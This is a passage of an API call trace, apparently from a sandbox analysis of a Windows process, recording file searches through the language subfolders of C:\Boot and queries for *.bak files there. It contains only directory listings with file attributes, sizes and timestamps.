lpFileName="C:\\Boot\\fr-FR\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.105] FindFirstFileW (in: lpFileName="C:\\Boot\\hr-HR\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.105] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.105] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.106] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.106] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.106] FindFirstFileW (in: lpFileName="C:\\Boot\\hr-HR\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.106] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.107] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.107] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13360, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.107] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.107] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.107] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.108] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.108] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.109] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.109] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.109] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb158, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.109] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb158, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.109] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.109] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.110] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.110] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.110] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.110] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa760, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.110] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa760, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.110] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.113] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.114] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.115] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.115] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211c6af1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.115] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa760, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.115] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa760, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.115] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.116] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.116] FindFirstFileW (in: lpFileName="C:\\Boot\\lt-LT\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.117] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.117] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.117] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.117] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.117] FindFirstFileW (in: lpFileName="C:\\Boot\\lt-LT\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.118] FindFirstFileW (in: lpFileName="C:\\Boot\\lv-LV\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.118] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.118] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12758, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.118] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12758, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.118] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.119] FindFirstFileW (in: lpFileName="C:\\Boot\\lv-LV\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.119] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.120] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.120] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.120] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.120] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.120] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.120] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.121] FindFirstFileW (in: 